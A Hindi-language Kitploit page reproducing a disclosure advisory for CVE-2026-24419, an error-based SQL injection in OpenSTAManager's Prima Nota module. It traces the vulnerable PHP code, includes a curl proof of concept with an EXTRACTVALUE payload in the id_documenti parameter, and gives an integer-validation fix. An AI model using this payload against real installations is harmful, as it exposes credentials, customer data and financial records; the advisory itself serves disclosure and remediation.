Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24419 — CVE-2026-24419 - OpenSTAManager has a SQL Injection in the Prima Nota module | Kitploit
उपकरण/GitHubGitHub/lukasz-rybak/cve-2026-24419
Vulnerability AnalysisWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHublukasz-rybak/cve-2026-24419

CVE-2026-24419

CVE-2026-24419 - OpenSTAManager has a SQL Injection in the Prima Nota module

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24419: OpenSTAManager में Prima Nota मॉड्यूल में SQL इंजेक्शन

अवलोकन

फ़ील्डविवरण
CVE IDCVE-2026-24419
गंभीरताउच्च
अनुशंसाअनुशंसा देखें
द्वारा खोजा गयाLukasz Rybak

प्रभावित उत्पाद

  • devcode-it/openstamanager (संस्करण: <= 2.9.8)

CWE वर्गीकरण

  • CWE-89: SQL कमांड में विशेष तत्वों का अनुचित तटस्थीकरण ('SQL Injection')

विवरण

सारांश

OpenSTAManager v2.9.8 के Prima Nota (जर्नल एंट्री) मॉड्यूल में क्रिटिकल एरर-आधारित SQL इंजेक्शन भेद्यता, प्रमाणित हमलावरों को URL पैरामीटर में दुर्भावनापूर्ण SQL इंजेक्ट करके XML त्रुटि संदेशों के माध्यम से उपयोगकर्ता क्रेडेंशियल्स, ग्राहक PII और वित्तीय रिकॉर्ड सहित पूर्ण डेटाबेस सामग्री निकालने की अनुमति देती है।

स्थिति: ✅ लाइव इंस्टेंस (v2.9.8) पर पुष्टि की गई और परीक्षण किया गया कमजोर पैरामीटर: id_documenti (GET पैरामीटर) प्रभावित एंडपॉइंट: /modules/primanota/add.php हमले का प्रकार: एरर-आधारित SQL इंजेक्शन (IN क्लॉज)

विवरण

OpenSTAManager v2.9.8 में Prima Nota (जर्नल एंट्री) मॉड्यूल की add.php फ़ाइल में एक क्रिटिकल एरर-आधारित SQL इंजेक्शन भेद्यता है। एप्लिकेशन यह सत्यापित करने में विफल रहता है कि GET पैरामीटर से अल्पविराम-पृथक मान SQL IN() क्लॉज में उपयोग करने से पहले पूर्णांक हैं, जिससे हमलावर मनमाने SQL कमांड इंजेक्ट कर सकते हैं और XPATH त्रुटि संदेशों के माध्यम से संवेदनशील डेटा निकाल सकते हैं।

भेद्यता श्रृंखला:

  1. प्रवेश बिंदु: /modules/primanota/add.php (पंक्तियाँ 63-67)

    root@kitploit:~
    $id_documenti = $id_documenti ?: get('id_documenti');
    $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
    

    प्रभाव: get() फ़ंक्शन उपयोगकर्ता-नियंत्रित URL पैरामीटर पुनर्प्राप्त करता है, explode(',', (string) ...) उन्हें अल्पविराम से विभाजित करता है, लेकिन कोई सत्यापन यह सुनिश्चित नहीं करता कि तत्व पूर्णांक हैं।

  2. SQL इंजेक्शन बिंदु: /modules/primanota/add.php (पंक्ति 306)

    root@kitploit:~
    $id_anagrafica = $dbo->fetchOne('SELECT idanagrafica FROM co_documenti WHERE id IN('.($id_documenti ? implode(',', $id_documenti) : 0).')')['idanagrafica'];
    

    प्रभाव: $id_documenti से सरणी तत्वों को प्रकार सत्यापन या prepare() के बिना सीधे implode() का उपयोग करके जोड़ा जाता है, जिससे पूर्ण SQL इंजेक्शन सक्षम होता है।

मूल कारण विश्लेषण:

भेद्यता इसलिए मौजूद है क्योंकि:

  1. get('id_documenti') उपयोगकर्ता-नियंत्रित स्ट्रिंग लौटाता है
  2. explode(',', (string) $value) अल्पविराम से विभाजित करता है लेकिन प्रकार सत्यापित नहीं करता
  3. implode(',', $array) सरणी तत्वों को सीधे SQL में जोड़ता है
  4. कोई सत्यापन यह सुनिश्चित नहीं करता कि सरणी तत्व पूर्णांक हैं
  5. हमलावर प्रदान करके SQL इंजेक्ट कर सकता है: ?id_documenti=1) AND EXTRACTVALUE(...) %23

प्रभावित कोड पथ:

root@kitploit:~
GET /modules/primanota/add.php?id_documenti=MALICIOUS_PAYLOAD
  ↓
add.php:63 - $id_documenti = get('id_documenti')
  ↓
add.php:64 - $id_documenti = explode(',', (string) $id_documenti) [कोई प्रकार सत्यापन नहीं]
  ↓
add.php:306 - WHERE id IN('.implode(',', $id_documenti).') [इंजेक्शन बिंदु]

PoC

चरण 1: लॉगिन

root@kitploit:~
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

चरण 2: भेद्यता सत्यापित करें (एरर-आधारित SQL इंजेक्शन)

परीक्षण 1: डेटाबेस उपयोगकर्ता और संस्करण निकालें

root@kitploit:~
curl -b /tmp/cookies.txt "http://localhost:8081/modules/primanota/add.php?id_documenti=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(USER(),'%20|%20',VERSION()))))%23"

प्रतिक्रिया (हमलावर को दिखाई देने वाला त्रुटि संदेश):

root@kitploit:~
<code>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: &#039;[email protected] | 8.3.0&#039;</code>
image

प्रभाव

Prima Nota (जर्नल एंट्री) मॉड्यूल तक पहुंच वाले सभी प्रमाणित उपयोगकर्ता।

अनुशंसित सुधार

प्राथमिक सुधार - प्रकार सत्यापन:

फ़ाइल: /modules/primanota/add.php

पहले (कमजोर - पंक्तियाँ 63-67):

root@kitploit:~
$id_documenti = $id_documenti ?: get('id_documenti');
$id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];

बाद में (सुधारित):

root@kitploit:~
$id_documenti = $id_documenti ?: get('id_documenti');
$id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
// Validate that all array elements are integers
$id_documenti = array_map('intval', $id_documenti);
$id_documenti = array_filter($id_documenti, fn($id) => $id > 0); // Remove zero/negative IDs

श्रेय

Łukasz Rybak द्वारा खोजा गया

संदर्भ

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24419
  • https://github.com/advisories/GHSA-4j2x-jh4m-fqv6

अस्वीकरण

इस CVE को समन्वित भेद्यता प्रकटीकरण प्रथाओं का पालन करते हुए जिम्मेदारी से प्रकट किया गया था। यहां प्रदान की गई जानकारी केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है।

टूल डाउनलोड करें